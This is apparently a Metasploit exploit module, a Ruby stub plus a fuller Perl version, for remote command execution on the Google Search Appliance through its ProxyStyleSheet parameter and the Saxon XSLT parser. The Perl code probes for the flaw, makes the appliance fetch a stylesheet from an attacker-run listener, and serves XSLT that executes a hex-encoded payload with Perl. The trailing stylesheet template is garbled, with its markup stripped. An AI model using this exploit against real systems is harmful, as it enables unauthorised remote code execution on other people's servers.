<xsl:value-of select="$front_page

require 'msf/core' module Msf class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', 'Description' => %q{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. }, 'Author' => [ 'hdm' ], 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '20981'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "", }, 'Targets' => [ [ 'Automatic Targetting', { 'Platform' => 'any', 'Ret' => 0x0, }, ], ], 'DisclosureDate' => 'Aug 16 2005', 'DefaultTarget' => 0)) end def exploit connect handler disconnect end =begin ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::google_proxystylesheet_exec; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket; use IO::Select; my $advanced = { }; my $info = { 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', 'Version' => '$Revision$', 'Authors' => [ 'H D Moore ' ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. }), 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'], 'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80], 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], 'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'], }, 'Payload' => { 'Space' => 1024, 'Keys' => [ 'cmd' ], }, 'Refs' => [ ['OSVDB', 20981], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Google Search Appliance'] ], 'Keys' => [ 'google' ], 'DisclosureDate' => 'Aug 16 2005', }; sub new { my $class = shift; my $self; $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced, }, @_); return $self; } sub Check { my $self = shift; my $s = $self->ConnectSearch; if (! $s) { return $self->CheckCode('Connect'); } my $url = "/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&". "site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&". "output=xml_no_dtd&". "q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&". "proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/"; $s->Send("GET $url HTTP/1.0\r\n\r\n"); my $page = $s->Recv(-1, 5); $s->Close; if ($page =~ /cannot be resolved to an ip address/) { $self->PrintLine("[*] This system appears to be vulnerable >:-)"); return $self->CheckCode('Confirmed'); } if ($page =~ /ERROR: Unable to fetch the stylesheet/) { $self->PrintLine("[*] This system appears to be patched"); } $self->PrintLine("[*] This system does not appear to be vulnerable"); return $self->CheckCode('Safe'); } sub Exploit { my $self = shift; my ($s, $page); # Request the index page to obtain a redirect response $s = $self->ConnectSearch || return; $s->Send("GET / HTTP/1.0\r\n\r\n"); $page = $s->Recv(-1, 5); $s->Close; # Parse the redirect to get the client and site values my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im; if (! $goog_site || ! $goog_clnt) { $self->PrintLine("[*] Invalid response to our request, is this a Google appliance?"); return; } # Create the listening local socket that will act as our HTTP server my $lis = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp'); if (not defined($lis)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $sel = IO::Select->new($lis); # Send a search request with our own address in the proxystylesheet parameter my $query = Pex::Text::AlphaNumText(int(rand(32))+1); my $proxy = "http://". ($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))). ":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl"; my $url = "/search?client=". $goog_clnt ."&site=". $goog_site . "&output=xml_no_dtd&proxystylesheet=". $proxy . "&q=". $query ."&proxyreload=1"; $self->PrintLine("[*] Sending our malicious search request..."); $s = $self->ConnectSearch || return; $s->Send("GET $url HTTP/1.0\r\n\r\n"); $page = $s->Recv(-1, 3); $s->Close; $self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ..."); # Did we receive a connection? my @r = $sel->can_read(30); if (! @r) { $self->PrintLine("[*] No connection received from the search engine, possibly patched."); $lis->close; return; } my $c = $lis->accept(); if (! $c) { $self->PrintLine("[*] No connection received from the search engine, possibly patched."); $lis->close; return; } my $cli = Msf::Socket::Tcp->new_from_socket($c); $self->PrintLine("[*] Connection received from ".$cli->PeerAddr."..."); $self->ProcessHTTP($cli); return; } sub ConnectSearch { my $self = shift; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $self->GetVar('RHOST'), 'PeerPort' => $self->GetVar('RPORT'), 'SSL' => $self->GetVar('SSL') ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } return $s; } sub ProcessHTTP { my $self = shift; my $cli = shift; my $targetIdx = $self->GetVar('TARGET'); my $target = $self->Targets->[$targetIdx]; my $ret = $target->[1]; my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $content; my $rhost; my $rport; # Read the first line of the HTTP request my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10)); # The way we call Runtime.getRuntime().exec, Java will split # our string on whitespace. Since we are injecting via XSLT, # inserting quotes becomes a huge pain, so we do this... my $exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' . unpack("H*", $self->GetVar('EncodedPayload')->RawPayload). '}))'; # Load the template from our data section, we have to manually # seek and reposition to allow the exploit to be used more # than once without a reload. seek(DATA, 0, 0); while() { last if /^__DATA__$/ } while() { $content .= $_ } # Insert our command line $content =~ s/:x:MSF:x:/$exec_str/; # Send it to the requesting appliance $rport = $cli->PeerPort; $rhost = $cli->PeerAddr; $self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT..."); my $res = "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n" . "Content-Length: " . length($content) . "\r\n" . "Connection: close\r\n" . "\r\n" . $content; $self->PrintLine("[*] Sending ".length($res)." bytes..."); $cli->Send($res); $cli->Close; } 1; # The default Google Mini style sheet is included below, with a few modifications to # the my_page_footer template. __DATA__ 1 images/Title_Left.gif 200 78 arial,sans-serif #ffffff #000000 #0000cc #551a8b #ff0000 both 1 Advanced Search 1 Search Tips 1 1 32 text Google Search 1 blue 0 google right -1 #6f6f6f 0 1 Did you mean: #cc0000 1 You could also try: #cc0000 1 KeyMatch #2255aa #e8e8ff 1 #0000cc 1 80% b 1 #008000 -1 1 1 1 1 #6f6f6f 0 Search Home Search Results Advanced Search Error both This is the cached copy of Unknown XML result type. View page source to see the offending XML. #cbdced XSLT Version:
XSLT Vendor:
XSLT URL:
OS:
Version:
Arch:
UserName:
UserHome:
UserDir:
Executing command...

#3366cc

#ffffff

<xsl:value-of select="$front_page_title"/>

Your search - - did not match any documents.
No pages were found containing "".

Suggestions:

Make sure all words are spelled correctly.
Try different keywords.
Try more general keywords.

/basics.html

/search?&proxycustom=<HOME/>

/search?

filter= /search?&proxycustom=<ADVANCED/>

<xsl:value-of select="$adv_page_title"/>

Advanced Web Search

Find results

with all of the words	<input type="text" name="as_q" size="25" value=" ">
with the exact phrase	<input type="text" name="as_epq" size="25" value=" ">
with any of the words	<input type="text" name="as_oq" size="25" value=" ">
without the words	<input type="text" name="as_eq" size="25" value=" ">

Language

Return pages written in

Occurrences

Return results where my terms occur

Domains

return results from the site or domain

e.g. google.com, .org

Sort

Security

Search public content only Search public content only Search public and secure content (login required) Search public and secure content (login required)

Page-Specific Search

Links

Find pages that link to the page

<xsl:value-of select="$result_page_title"/>: <xsl:value-of disable-output-escaping="yes" select="$html_escaped_query"/>

<input type="text" name="q" size=" " maxlength="256" value=" ">
Search: public content public content public and secure content public and secure content

&sort=date%3AD%3AS%3Ad1

Sort by: Date / Relevance Date / Relevance

In order to show you the most relevant results, we have omitted some entries very similar to the already displayed.
If you like, you can repeat the search with the omitted results included.

simple